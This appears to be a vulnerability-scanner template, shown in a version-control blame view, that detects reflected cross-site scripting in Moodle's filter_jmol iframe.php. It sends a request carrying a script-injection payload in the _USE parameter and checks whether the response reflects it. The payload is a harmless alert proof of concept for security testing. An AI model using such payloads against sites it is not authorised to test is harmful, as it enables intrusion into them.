2020-04-08 16:52:17 +00:00
|
|
|
id: moodle-filter-jmol-xss
|
2020-04-08 12:48:06 +00:00
|
|
|
|
|
|
|
info:
|
2020-08-25 19:43:43 +00:00
|
|
|
name: Moodle filter_jmol - XSS
|
2020-04-08 12:48:06 +00:00
|
|
|
author: madrobot
|
2020-05-24 22:19:21 +00:00
|
|
|
severity: medium
|
2020-08-25 19:43:43 +00:00
|
|
|
description: Cross-site scripting on Moodle.
|
2020-04-08 12:48:06 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/filter/jmol/iframe.php?_USE=%22};alert(1337);//"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 12:48:06 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-24 22:19:21 +00:00
|
|
|
- 200
|
2020-04-08 13:27:52 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2020-05-24 22:19:21 +00:00
|
|
|
- '\"};alert(1337);//'
|
2020-04-08 12:48:06 +00:00
|
|
|
part: body
|